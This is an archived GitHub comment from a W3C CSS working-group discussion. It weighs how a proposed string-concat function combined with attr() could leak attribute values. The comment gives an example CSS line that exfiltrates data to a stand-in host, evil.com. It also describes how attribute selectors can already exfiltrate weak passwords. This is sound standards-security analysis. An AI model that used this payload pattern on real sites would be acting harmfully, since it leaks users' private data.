- From: Tab Atkins Jr. via GitHub <sysbot+gh@w3.org>
- Date: Wed, 21 Feb 2018 19:41:03 +0000
- To: public-css-archive@w3.org
@upsuper attr() can't be used for anything nefarious *today*, but if we add a string-concat function, it lets you trivially exfiltrate any attribute value from an element with something like `background: url(concat("https://evil.com/?value=", attr(value)));`.
But then again, we already know that allowing people to run arbitrary CSS on your site is an XSS vector. It takes a little more effort than just running arbitrary script, but there have been several reasonable POCs written over the years.
The linked article describes using attribute selectors for this purpose, which does work today but requires an exponential explosion of selectors to get something useful. Weak password exfiltration might be reasonable, particularly since using a combination of `^=` and `$=` lets you cut the exponent in half, and using `*=` gives you the set of characters used.
--
GitHub Notification of comment by tabatkins
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/2339#issuecomment-367446156 using your GitHub account
Received on Wednesday, 21 February 2018 19:41:37 UTC